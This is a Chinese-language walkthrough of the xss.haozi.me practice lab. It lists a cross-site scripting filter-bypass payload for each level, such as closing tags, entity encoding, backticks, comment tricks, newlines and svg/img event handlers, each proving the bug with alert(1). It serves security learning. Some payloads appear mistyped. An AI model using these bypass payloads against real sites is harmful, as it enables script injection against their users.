xss.haozi.me在线靶机挑战

环境：

直接通过浏览器，访问该网址即可，第一次加载可能比较慢，输入自己名称就可进入。

0x00

第一关没有啥限制，直接使用最简单的弹窗语句进行测试< script>alert(1)< /script >

这一关的输出很明显是在< textarea >标签里面的，但是这个标签只能输入文本，而不能执行相应语句，属于rcdata元素 ,所以只能先将标签闭合，然后进行弹窗

</textarea><script>alert(1)</script><textarea>

0x02

直接先把input标签进行闭合

xxx"><script>alert(1)</script>

0x03

通过查看源码可以看见这一关是将括号给过滤掉了，也就是说alert()的括号不可以直接打印出来，我首先想到的就是用反引号来替换，然后还有一种就是通过实体编码的方式把（）转换一下这里设计了一个模板字符串的概念需要下去了解一下。

#<script>alert& #40;1& #41;</script>
#<script>alert`1`</script>

0x04

好家伙，上一关我才通过反引号的方式进入绕过，她这一关直接给我过滤了，还好我还有第二招通过编码绕过，试试效果

<svg/onload=alert((1)>

0x05

这一关下面显示的时候将注释符号（–>）过滤成了一个笑脸的表情，我们要想进行我们自己语句就要把注释给闭合上，所以可以使用另一种注释的符号（–!>）从而构造成下面的语句,这里输入时候需要主要注释符的书写

--!><script>alert(1)</script><!--

0x06

查看源码可以知道这里将auto或者on过滤成了_，并且是在input标签输出，所以这里可以将type的值改成imge的形式进行输出，并且使用换行的方式来让语句不以on开头和=结尾的正则表达式的绕过所以构造以下的语句进行测试，当然这道题只要是用on开头的事件都是可以的

type="image"src=1 onerror
=alert(1)

0x07

这一关过滤了标签符号啊，所以没有办法写标签，也没有办法闭合。同时把反引号也过滤了。但但是html中img标签是可以不写后面的“>”,因为它有html自动具有一种纠错机制，构造以下语句进行绕过


<img src="1" onerror="alert(1)"

0x08

查看源码可以继续发现本关将输入数据放入在一个<style>标签中，并过滤了</style>标签防止我们进行闭合操作。本关的绕过思路是使用换行操作，因为他只识别某一行特定字符进行过滤，但html可以执行不同行的命令，所以使用换行操作进行闭合style标签绕过过滤，语句如下

</style
>
<script>alert(1)</script

0x09

这一关必须以https://www.segmentfault.com为开头，否则不能输入，然后就将script标签闭合在写点击事件就可以了。

https://www.segmentfault.com"></script><svg/onload=alert(1)<script>

0x0B

根据源码可以看见这里它将所有字母转大写。但是我们仍然可以使用编码来转换。

<svg/οnlοad=alert(1)>

0x0C

这一关过滤了script，并且将字母转为大写。感觉跟上一关的差不多，可以用相同语句先尝试一下


<svg/οnlοad=alert(1)>

0x0D

这一关我们可以发现/这个符号被过滤掉了。我们尝试用换行的方式，同时注释掉后面的

alert(1)
–>

0x0F

这一关就是将一些符号进行了编码；但是这也是可以识别的，所以就是将src闭合，然后写弹窗然后将后面注释

aaa’),alert(1)//

0x10

这一关没啥难的，直接用alert弹窗就好了，将我们输入的值当变量传进去了

0x11

这一关可以看见大多数的符号都已经被转换掉了，导致我们在绕过的时候，很多标签都是用不了，这里用到上课老师教的技巧

"),alert(1)//

0x12

这一关将"过滤成了"，所以可以使用转义符号将先将\转义，就可以过关了。

\"),alert(1)//